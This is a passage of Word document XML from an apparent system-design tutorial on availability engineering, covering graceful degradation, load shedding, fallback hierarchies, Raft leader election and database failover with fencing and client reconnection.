          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>The system stops executing that feature's code path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4225846D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Returns a degraded response (without the feature) rather than an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3456131A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Netflix's recommendation engine. If the recommendation service is overloaded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6527AD8D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Kill switch disabled → show generic popular titles instead of personalized recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E39E3A6" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Users still see content and can watch. They just don't get personalized recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDF2096" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>The system is </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>degraded, not down</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F1E6B3" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shedding Load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722C0A16" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>When a system is overloaded, it should </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>proactively reject low-priority requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> rather than trying to serve all requests poorly (causing timeouts for everyone).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8BDC84" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Priority-based load shedding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7697646E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Define request priority tiers (e.g., paid users &gt; free users, write operations &gt; read operations, foreground &gt; background).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F4BDCF" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>When CPU/memory/queue depth exceeds a threshold, start rejecting </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lowest priority</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> requests first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50226CC4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Return 503 with Retry-After header — clients know to back off and retry later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B36861" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The counterintuitive wisdom:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Rejecting 20% of requests and serving 80% correctly is </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>better</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> than serving 100% of requests poorly (timeouts, errors). A 503 is fast — the client knows immediately to retry or fallback. A timeout wastes the client's time for 30 seconds before failing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B82E87" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Queue depth as a signal:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Monitoring queue depth (in-flight requests waiting for processing) gives early warning of overload. When queue depth exceeds a threshold, start shedding. Don't wait for CPU to spike to 100% — by then you're already in overload collapse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DDA9FD" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fallback Hierarchy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACF2A8B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Define a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cascade of fallbacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> for every critical operation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A01C51" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316B3927" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Tier 1 (normal):      Fetch personalized recommendations from ML service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797C4C08" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Tier 2 (degraded):    Fetch cached recommendations from Redis (may be stale)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307DB7F5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Tier 3 (degraded++):  Fetch generic popular items from database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6206FEF4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Tier 4 (minimal):     Return hardcoded featured items from config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416FC563" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Tier 5 (emergency):   Return empty response with "recommendations unavailable"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F42C45" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Each tier is attempted only when the previous tier fails. The system gracefully falls through the hierarchy, always returning </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>something</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> rather than nothing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5353F1" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="32053F35">
          <v:rect id="_x0000_i2153" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C82E93" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Stateful Service Availability — The Hard Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAF9825" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Stateless services are easy to make highly available — add more instances, load balance across them. Stateful services (databases, caches, coordination services) are the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hard part</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> of availability engineering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6C75A6" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Leader Election</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EA093F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Distributed stateful systems need a leader (primary) for write coordination. Leader election must be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7171623E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Safe:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Only one leader at a time (no split-brain).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D2D2BF" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Live:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> A new leader is eventually elected after the old one fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EBA45B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fast:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Election completes quickly to minimize unavailability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220D0F07" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Raft Consensus Algorithm (used by etcd, CockroachDB, TiKV):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A063C75" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Raft divides time into </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>terms</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> — monotonically increasing integers. Each term has at most one leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4A4832" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Leader election process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C06B07" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>All nodes start as </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>followers</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>, expecting heartbeats from a leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D69C40" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If a follower doesn't receive a heartbeat within an </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>election timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> (150–300ms, randomized), it </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>becomes a candidate</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> and starts an election.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C34F946" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>The candidate increments the term, votes for itself, and sends RequestVote RPCs to all other nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274BCAD9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t>A node votes for a candidate if: (a) the candidate's term is ≥ the node's current term, and (b) the candidate's log is at least as up-to-date as the voter's log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B1A733" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If the candidate receives votes from a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>majority of nodes</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> → it becomes leader, starts sending heartbeats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37680421" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If no majority is achieved (e.g., two candidates split votes) → election timeout expires, new election starts with higher term.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C732D19" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why randomized election timeout?</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> If all nodes use the same timeout, they all become candidates simultaneously and split votes indefinitely. Randomization ensures one node typically times out first and wins the election before others start competing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5995DA05" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Log completeness requirement (the safety guarantee):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> A candidate can only win election if its log is </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>at least as up-to-date</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> as a majority of nodes. This guarantees the new leader has all committed log entries — no committed writes are lost during leadership transitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D9C5A9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Availability during election:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> The cluster is </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unavailable for writes</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> during the election — typically 150–300ms. Reads may still be served from followers if your consistency requirements allow it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1180C80D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database Failover Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14876488" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>When the primary database fails:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292865A9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1 — Failure Detection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Monitoring agent, load balancer, or replica detects heartbeat timeout. This takes </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10–30 seconds</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> with typical configurations. Aggressive monitoring (5-second heartbeats, 3-miss threshold) can reduce this to </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15 seconds</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD0DD56" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2 — Replica Election:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> The most up-to-date replica (the one with the lowest replication lag) is promoted. In PostgreSQL streaming replication with Patroni: the replicas check their WAL positions, the replica with the highest LSN (Log Sequence Number) is promoted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C7F706" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3 — Fencing the Old Primary:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Critical step often skipped by DIY failover implementations. Before the new primary starts accepting writes, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>old primary must be fenced</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> — prevented from accepting any new writes. Otherwise:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325C5F4C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Network partition scenario: old primary thinks it's still primary, new primary is promoted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC0B057" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Both accept writes → split-brain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2739C942" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t>Fencing mechanisms: STONITH (Shoot The Other Node In The Head) — physically power off or fence the old primary via out-of-band management (IPMI, AWS EC2 API to stop the instance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEA9FAC" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4 — Client Reconnection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Clients with connections to the old primary receive connection errors and must reconnect. The new primary's address is published via:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FC7A41" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS update:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Change the db-primary.internal DNS record to point to the new primary. Clients reconnect after their DNS cache expires (TTL matters here — keep internal service DNS TTLs at 10–30 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EAD154" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Virtual IP (VIP) takeover:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> The new primary claims a floating VIP via ARP announcement. Clients connected to the VIP are transparently redirected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6D4275" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proxy layer (HAProxy, PgBouncer):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> The proxy detects the new primary and updates its backend. Clients talk to the proxy — they never need to reconnect.</w:t>
      </w:r>
    </w:p>
